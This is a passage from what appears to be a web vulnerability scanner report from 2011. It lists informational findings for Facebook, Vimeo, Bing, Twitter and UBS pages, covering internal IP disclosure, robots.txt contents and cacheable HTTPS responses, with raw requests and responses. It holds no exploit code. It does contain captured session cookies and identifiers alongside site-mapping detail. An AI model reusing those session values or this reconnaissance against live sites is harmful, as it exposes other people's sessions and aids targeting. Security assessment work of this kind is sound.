Path:   /sharer/sharer.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /sharer/sharer.php?u=https%3A%2F%2Fwww.microsoft.com%2Fpresspass%2Fpresskits%2FDCU%2Fdefault.aspx HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=83J6J

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/login.php
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: next=http%3A%2F%2Fwww.facebook.com%2Fsharer%2Fsharer.php%3Fu%3Dhttps%253A%252F%252Fwww.microsoft.com%252Fpresspass%252Fpresskits%252FDCU%252Fdefault.aspx; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=%2Fsharer%2Fsharer.php%3Fu%3Dhttps%253A%252F%252Fwww.microsoft.com%252Fpresspass%252Fpresskits%252FDCU%252Fdefault.aspx; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.163.35
X-Cnection: close
Date: Wed, 06 Jul 2011 11:15:22 GMT
Content-Length: 0

17.17. http://www.facebook.com/sharer/sharer.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sharer/sharer.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /sharer/sharer.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/login.php
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: next=http%3A%2F%2Fwww.facebook.com%2Fsharer%2Fsharer.php; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=%2Fsharer%2Fsharer.php; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.223.46
Connection: close
Date: Wed, 06 Jul 2011 11:21:53 GMT
Content-Length: 0

17.18. http://www.vimeo.com/moogaloop.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vimeo.com
Path:   /moogaloop.swf

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /moogaloop.swf HTTP/1.1
Host: www.vimeo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:57:04 GMT
Server: Apache
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Expires: Wed, 06 Jul 2011 01:57:04 GMT
X-Server: 10.90.128.70
Vary: Accept-Encoding
Content-Length: 245
Connection: close
Content-Type: application/x-shockwave-flash

FWS.....p...........?........
..embed_location.moogaloop.moogaloop_type.player.vimeo.com.player_server.a.vimeocdn.com.cdn_server.http://a.vimeocdn.com/p/flash/moogaloop/5.1.18/moogaloop.swf._root.....
...[SNIP]...
18. Credit card numbers disclosed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /search

Issue detail

The following credit card number was disclosed in the response:

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.

Request

GET /search?q=presspass%20controls&FORM=MSSBMN HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:19:45 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
X-UA-Compatible: IE=7
Date: Wed, 06 Jul 2011 11:20:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _SS=SID=E9BAB4C7FF984C72A2A7D8BEAEA22874; domain=.bing.com; path=/
Set-Cookie: MUID=067CC8A94F2C44DCA6EE1FBCBC8D44CF; expires=Fri, 05-Jul-2013 11:20:45 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=067CC8A94F2C44DCA6EE1FBCBC8D44CF%2c10716aee572d4952b36b2971f6480e26; expires=Fri, 05-Jul-2013 11:20:45 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=D=1846760&MS=1846760&AF=MSSBMN; expires=Fri, 05-Jul-2013 11:20:45 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=18047B6C75F646499C286F39250DB552; expires=Fri, 05-Jul-2013 11:20:45 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110706; expires=Fri, 05-Jul-2013 11:20:45 GMT; domain=.bing.com; path=/
Content-Length: 35959

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
<div class="sa_cc" docId="4637482576447596?false">
...[SNIP]...
<a class="sa_cpt" u="2|1020|4637482576447596|50d8103b,a06cc344">
...[SNIP]...
19. Robots.txt file  previous  next
There are 9 instances of this issue:

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

19.1. http://tag.admeld.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tag.admeld.com

Response

HTTP/1.0 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Last-Modified: Fri, 01 Jul 2011 14:31:20 GMT
ETag: "33db8a-1a-4a702df00fe00"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Date: Wed, 06 Jul 2011 15:39:06 GMT
Connection: close

User-agent: *
Disallow: /
19.2. http://twitter.com/intent/session  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /intent/session

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: twitter.com

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:15:28 GMT
Server: Apache
Last-Modified: Tue, 05 Jul 2011 19:19:41 GMT
Accept-Ranges: bytes
Content-Length: 519
Cache-Control: max-age=86400
Expires: Thu, 07 Jul 2011 11:15:28 GMT
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
Connection: close
Content-Type: text/plain; charset=UTF-8

#Google Search Engine Robot
User-agent: Googlebot
# Crawl-delay: 10 -- Googlebot ignores crawl-delay ftl
Allow: /*?*_escaped_fragment_
Disallow: /*?
Disallow: /*/with_friends

#Yahoo! Search Engine Ro
...[SNIP]...
19.3. http://widgets.digg.com/buttons/count  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /buttons/count

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: widgets.digg.com

Response

HTTP/1.1 200 OK
Age: 0
Date: Wed, 06 Jul 2011 11:55:06 GMT
Via: NS-CACHE: 100
Server: Apache
Last-Modified: Sun, 27 Jul 2008 09:42:54 GMT
Accept-Ranges: bytes
X-Digg-Time: D=266 (null)
Content-Type: text/plain; charset=UTF-8
Cache-Control: private, max-age=86399
Expires: Thu, 07 Jul 2011 11:55:05 GMT
X-CDN: Cotendo
Connection: close

User-agent: *
Disallow: /
19.4. http://www.facebook.com/sharer/sharer.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sharer/sharer.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.62.162.52
Connection: close
Content-Length: 2553

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...
19.5. http://www.ibb.ubs.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ibb.ubs.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ibb.ubs.com

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:51:33 GMT
Server: Apache
Last-Modified: Thu, 09 Oct 2008 15:17:41 GMT
ETag: "9e5995-107-458d388a98f40"
Accept-Ranges: bytes
Content-Length: 263
Connection: close
Content-Type: text/plain

User-Agent: *
Allow: /
Disallow: /us_html_email
Disallow: /us_html_email/
Disallow: /Conferences/
Disallow: /conferences/
Disallow: /Conferences
Disallow: /conferences
Disallow: /___ADMIN/
Disallow: /
...[SNIP]...
19.6. http://www.stumbleupon.com/submit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /submit

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.stumbleupon.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 31 May 2011 21:14:03 GMT
Keep-Alive: timeout=30, max=100
Content-Type: text/plain; charset=iso-8859-1
Content-Length: 1962
Date: Wed, 06 Jul 2011 11:15:26 GMT
Age: 95
Via: 1.1 varnish
Connection: close

Sitemap: http://stumbleupon.com/sitemap.blogA_index.xml
Sitemap: http://stumbleupon.com/sitemap.blogB_index.xml
Sitemap: http://stumbleupon.com/sitemap.review_index.xml
Sitemap: http://stumbleupon.com
...[SNIP]...
19.7. http://www.ubs.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ubs.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ubs.com

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:50:01 GMT
Server: Apache
Last-Modified: Fri, 09 Apr 2010 09:37:46 GMT
ETag: "b039-774-8c38ae80"
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Accept-Ranges: bytes
Content-Length: 1908
Content-Type: text/plain
Connection: close

#
# robots.txt file from http://www.ubs.com
# (c) UBS AG, last modification: 17.10.2005
#
# exclude rendered images
# exclude domicile sensitive pages
# exclude service finder pages
#

User-a
...[SNIP]...
19.8. https://www.ubs.com/7/dcs6nkwvw00000ouf3tc69cst_8i5h/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ubs.com
Path:   /7/dcs6nkwvw00000ouf3tc69cst_8i5h/dcs.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ubs.com

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:51:09 GMT
Server: Apache
Last-Modified: Fri, 09 Apr 2010 09:37:46 GMT
ETag: "b039-774-8c38ae80"
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Accept-Ranges: bytes
Content-Length: 1908
Content-Type: text/plain
Connection: close

#
# robots.txt file from http://www.ubs.com
# (c) UBS AG, last modification: 17.10.2005
#
# exclude rendered images
# exclude domicile sensitive pages
# exclude service finder pages
#

User-a
...[SNIP]...
19.9. https://www2.ubs.com/1/ssl/e/contact/contact.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.ubs.com
Path:   /1/ssl/e/contact/contact.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www2.ubs.com

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:50:48 GMT
Server: Apache
Last-Modified: Fri, 09 Apr 2010 09:37:46 GMT
ETag: "b039-774-8c38ae80"
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Accept-Ranges: bytes
Content-Length: 1908
Content-Type: text/plain
Connection: close

#
# robots.txt file from http://www.ubs.com
# (c) UBS AG, last modification: 17.10.2005
#
# exclude rendered images
# exclude domicile sensitive pages
# exclude service finder pages
#

User-a
...[SNIP]...
20. Cacheable HTTPS response  previous  next
There are 22 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

20.1. https://selfservice.ibb.ubs.com/idm/user/ubs/ubs_selfServiceWelcome.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://selfservice.ibb.ubs.com
Path:   /idm/user/ubs/ubs_selfServiceWelcome.jsp

Request

GET /idm/user/ubs/ubs_selfServiceWelcome.jsp HTTP/1.1
Host: selfservice.ibb.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 06 Jul 2011 14:07:45 GMT
Server: Apache/1.3.27 (Unix) mod_jk/1.2.15 mod_perl/1.29 mod_ssl/2.8.14 OpenSSL/0.9.7b
Content-Language: en
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=D8A446E01118B6D3FECEC5B8203F8A68; Path=/idm; Secure
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html40/loose.dtd">
<html>
<head>



...[SNIP]...
20.2. https://www.ubs.com/1/e/online/contact.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ubs.com
Path:   /1/e/online/contact.html

Request

GET /1/e/online/contact.html HTTP/1.1
Host: www.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:57:50 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 49559
Cache-Control: must-revalidate
Vary: Accept-Encoding
Age: 632
WipExpirationDate: July 6, 2011 16:01
Expires: Wed, 06 Jul 2011 14:01:00 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en">

<head>

<meta http-equiv="content-type" content="text/html;
...[SNIP]...
20.3. https://www2.ubs.com/1/RenderImage/contact/contact  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.ubs.com
Path:   /1/RenderImage/contact/contact

Request

GET /1/RenderImage/contact/contact HTTP/1.1
Host: www2.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:56:47 GMT
Server: Apache
Content-Language: en
Last-Modified: Wed, 06 Jul 2011 13:56:47 GMT
Vary: Accept-Encoding
Cache-Control: must-revalidate
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Expires: Thu, 07 Jul 2011 13:56:47 GMT
Age: 0
Connection: close
Content-Type: text/plain
Content-Length: 0

20.4. https://www2.ubs.com/1/RenderImage/contact/locations  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.ubs.com
Path:   /1/RenderImage/contact/locations

Request

GET /1/RenderImage/contact/locations HTTP/1.1
Host: www2.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:56:47 GMT
Server: Apache
Content-Language: en
Last-Modified: Wed, 06 Jul 2011 13:56:47 GMT
Vary: Accept-Encoding
Cache-Control: must-revalidate
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Expires: Thu, 07 Jul 2011 13:56:47 GMT
Age: 0
Connection: close
Content-Type: text/plain
Content-Length: 0

20.5. https://www2.ubs.com/1/RenderImage/contact/order  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.ubs.com
Path:   /1/RenderImage/contact/order

Request

GET /1/RenderImage/contact/order HTTP/1.1
Host: www2.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:56:47 GMT
Server: Apache
Content-Language: en
Last-Modified: Wed, 06 Jul 2011 13:56:47 GMT
Vary: Accept-Encoding
Cache-Control: must-revalidate
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Expires: Thu, 07 Jul 2011 13:56:47 GMT
Age: 0
Connection: close
Content-Type: text/plain
Content-Length: 0

20.6. https://www2.ubs.com/1/e/contact.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.ubs.com
Path:   /1/e/contact.html

Request

GET /1/e/contact.html HTTP/1.1
Host: www2.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:57:32 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 38021
Cache-Control: must-revalidate
Vary: Accept-Encoding
Age: 1
WipExpirationDate: July 6, 2011 16:01
Expires: Wed, 06 Jul 2011 14:01:00 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en">

<head>

<meta http-equiv="content-type" content="text/html;
...[SNIP]...
20.7. https://www2.ubs.com/1/e/contact/contactus.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.ubs.com
Path:   /1/e/contact/contactus.html

Request

GET /1/e/contact/contactus.html HTTP/1.1
Host: www2.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:57:33 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 38287
Cache-Control: must-revalidate
Vary: Accept-Encoding
Age: 1
WipExpirationDate: July 6, 2011 16:01
Expires: Wed, 06 Jul 2011 14:01:00 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en">

<head>

<meta http-equiv="content-type" content="text/html;
...[SNIP]...
20.8. https://www2.ubs.com/1/e/contact/locations.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.ubs.com
Path:   /1/e/contact/locations.html

Request

GET /1/e/contact/locations.html HTTP/1.1
Host: www2.ubs.com
Connection: keep-alive
Referer: https://www2.ubs.com/1/e/contact/order.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; NavLB_Www=www2.ubs.com; NavLB_PQ=quotes-public1.ubs.com; ubslang=en-US; NavLB_EB=ebanking2.ubs.com; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309982107183:ss=1309981804815

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:55:17 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Cache-Control: must-revalidate
Vary: Accept-Encoding
Age: 1
WipExpirationDate: July 6, 2011 16:01
Expires: Wed, 06 Jul 2011 14:01:00 GMT
Connection: close
Content-Length: 35554

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en">

<head>

<meta http-equiv="content-type" content="text/html;
...[SNIP]...
20.9. https://www2.ubs.com/1/e/contact/order.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.ubs.com
Path:   /1/e/contact/order.html

Request

GET /1/e/contact/order.html HTTP/1.1
Host: www2.ubs.com
Connection: keep-alive
Referer: https://www2.ubs.com/1/ssl/e/contact/contact.html?NavLB_Www=1309960260
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; NavLB_Www=www2.ubs.com; NavLB_PQ=quotes-public1.ubs.com; ubslang=en-US; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309982088978:ss=1309981804815; NavLB_EB=ebanking2.ubs.com

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:55:06 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Cache-Control: must-revalidate
Vary: Accept-Encoding
Age: 1
WipExpirationDate: July 6, 2011 16:01
Expires: Wed, 06 Jul 2011 14:01:00 GMT
Connection: close
Content-Length: 51635

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en">

<head>

<meta http-equiv="content-type" content="text/html;
...[SNIP]...
20.10. https://www2.ubs.com/1/e/globalam/funds.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.ubs.com
Path:   /1/e/globalam/funds.html

Request

GET /1/e/globalam/funds.html HTTP/1.1
Host: www2.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:57:31 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 28478
Cache-Control: must-revalidate
Vary: Accept-Encoding
Age: 2
WipExpirationDate: July 6, 2011 16:01
Expires: Wed, 06 Jul 2011 14:01:00 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en">

<head>

<meta http-equiv="content-type" content="text/html;
...[SNIP]...
20.11. https://www2.ubs.com/1/e/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.ubs.com
Path:   /1/e/index.html

Request

GET /1/e/index.html HTTP/1.1
Host: www2.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:57:35 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 37443
Cache-Control: must-revalidate
Vary: Accept-Encoding
Age: 4
WipExpirationDate: July 6, 2011 16:01
Expires: Wed, 06 Jul 2011 14:01:00 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
20.12. https://www2.ubs.com/1/e/index/legalinfo2/disclaimer.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.ubs.com
Path:   /1/e/index/legalinfo2/disclaimer.html

Request

GET /1/e/index/legalinfo2/disclaimer.html HTTP/1.1
Host: www2.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:57:36 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 51456
Cache-Control: must-revalidate
Vary: Accept-Encoding
Age: 1
WipExpirationDate: July 6, 2011 16:01
Expires: Wed, 06 Jul 2011 14:01:00 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en">

<head>

<meta http-equiv="content-type" content="text/html;
...[SNIP]...
20.13. https://www2.ubs.com/1/e/index/legalinfo2/privacy.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.ubs.com
Path:   /1/e/index/legalinfo2/privacy.html

Request

GET /1/e/index/legalinfo2/privacy.html HTTP/1.1
Host: www2.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:57:37 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 48634
Cache-Control: must-revalidate
Vary: Accept-Encoding
Age: 743
WipExpirationDate: July 6, 2011 16:01
Expires: Wed, 06 Jul 2011 14:01:00 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en">

<head>

<meta http-equiv="content-type" content="text/html;
...[SNIP]...
20.14. https://www2.ubs.com/1/e/service_finder/individual.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.ubs.com
Path:   /1/e/service_finder/individual.html

Request

GET /1/e/service_finder/individual.html HTTP/1.1
Host: www2.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:57:40 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 25246
Cache-Control: must-revalidate
Vary: Accept-Encoding
Age: 1
WipExpirationDate: July 6, 2011 16:01
Expires: Wed, 06 Jul 2011 14:01:00 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en">

<head>

<meta http-equiv="content-type" content="text/html;
...[SNIP]...
20.15. https://www2.ubs.com/1/e/ubs_ch/private/cards/creditcards/services/customerservice.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.ubs.com
Path:   /1/e/ubs_ch/private/cards/creditcards/services/customerservice.html

Request

GET /1/e/ubs_ch/private/cards/creditcards/services/customerservice.html HTTP/1.1
Host: www2.ubs.com
Accept: */*
Accept-Language: en
